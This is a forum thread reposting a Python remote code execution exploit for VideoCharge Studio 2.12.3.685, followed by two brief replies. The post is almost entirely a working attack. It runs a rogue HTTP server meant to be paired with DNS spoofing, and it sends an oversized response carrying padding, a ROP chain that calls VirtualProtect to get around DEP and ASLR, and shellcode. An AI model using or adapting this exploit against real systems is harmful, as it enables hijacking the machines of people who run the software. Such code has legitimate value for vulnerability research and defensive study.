sensi Posted February 22, 2014 Report Share Posted February 22, 2014 VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit#!/usr/bin/python# Exploit Title: VideoCharge Studio v2.12.3.685 GetHttpResponse() MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)# Version: v2.12.3.685# Date: 2014-02-19# Author: Julien Ahrens (@MrTuxracer)# Homepage: http://www.rcesecurity.com# Software Link: http://www.videocharge.com# Tested on: Win7-GER (DEP enabled)## Howto / Notes:# Since it's a MITM RCE you need to spoof the DNS Record for www.videocharge.com in order to successfully exploit this vulnerability#from socket import *from struct import packfrom time import sleephost = "192.168.0.1"port = 80s = socket(AF_INET, SOCK_STREAM)s.bind((host, port))s.listen(1)print "\n[+] Listening on %d ..." % portcl, addr = s.accept()print "[+] Connection accepted from %s" % addr[0]# Thanks Giuseppe D'Amore for the amazing shellcode# http://www.exploit-db.com/exploits/28996/shellcode = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+"\x49\x0b\x31\xc0\x51\x50\xff\xd7")junk0 = "\x90" * 1277junk1 = "\x90" * 1900nops="\x90" * 30jmpesp=pack('<L',0x102340e8) * 5 # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]# jump to controlled memoryeip=pack('<L',0x61b84af1) # {pivot 4124 / 0x101c} # ADD ESP,101C # RETN [zlib1.dll]## ROP registers structure:# EBP - VirtualProtect() call# ESP - lpAddress# EBX - dwSize# EDX - flNewProtect# ECX - lpflOldProtect## Craft VirtualProtect() call (0x0080D816) via [DE2D66F9 XOR DEADBEEF] and MOV to EBProp = pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]rop += pack('<L',0xDE2D66F9) # XOR param 1rop += pack('<L',0x10206ac5) # POP EBX # RETN [cc.dll]rop += pack('<L',0xDEADBEEF) # XOR param 2rop += pack('<L',0x1002fb27) # XOR EDI,EBX # ADD DL,BYTE PTR DS:[EAX] # RETN [cc.dll]rop += pack('<L',0x101f7572) # MOV EAX,EDI # POP EDI # RETN [cc.dll] rop += pack('<L',0xDEADBEEF) # Fillerrop += pack('<L',0x101fbc62) # XCHG EAX,EBP # RETN [cc.dll]# Craft VirtualProtect() dwSize in EAX and MOV to EBXrop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]rop += pack('<L',0x101f2adc) # ADD EAX,500 # RETN [cc.dll]rop += pack('<L',0x1023ccfb) # XCHG EAX,EBX # RETN [cc.dll]# Craft VirtualProtect() flNewProtect in EAX and MOV to EDXrop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]rop += pack('<L',0x102026a1) # ADD EAX,25 # RETN [cc.dll]rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]rop += pack('<L',0x102026b1) # ADD EAX,3 # RETN [cc.dll]rop += pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]rop += pack('<L',0x61b90402) # MOV EDX,ECX # RETN [zlib1.dll]# Put writable offset for VirtualProtect() lpflOldProtect to ECXrop += pack('<L',0x1020aacf) # POP ECX # RETN [cc.dll]rop += pack('<L',0x61B96180) # writable location [zlib1.dll]# POP a value from the stack after PUSHAD and POP value to ESI# as a preparation for the VirtualProtect() callrop += pack('<L',0x61b850a4) # POP ESI # RETN [zlib1.dll]rop += pack('<L',0x61B96180) # writable location from [zlib1.dll]rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]# Achievement unlocked: PUSHADrop += pack('<L',0x101e93d6) # PUSHAD # RETN [cc.dll]rop += pack('<L',0x102340c5) # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]payload = junk0 + eip + junk1 + rop + jmpesp + nops + shellcodebuffer = "HTTP/1.1 200 OK\r\n"buffer += "Date: Sat, 09 Feb 2014 13:33:37 GMT\r\n"buffer += "Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g\r\n"buffer += "X-Powered-By: PHP/5.2.6-1+lenny16\r\n"buffer += "Vary: Accept-Encoding\r\n"buffer += "Content-Length: 4000\r\n"buffer += "Connection: close\r\n"buffer += "Content-Type: text/html\r\n\r\n"buffer += payloadbuffer += "\r\n"print cl.recv(1000)cl.send(buffer)print "[+] Sending exploit: OK\n"sleep(3)cl.close()s.close()source Quote Link to comment Share on other sites More sharing options...
BkDService Posted February 22, 2014 Report Share Posted February 22, 2014 A testat cineva ? Quote Link to comment Share on other sites More sharing options...
MusicAgain Posted March 9, 2014 Report Share Posted March 9, 2014 Pf... Quote Link to comment Share on other sites More sharing options...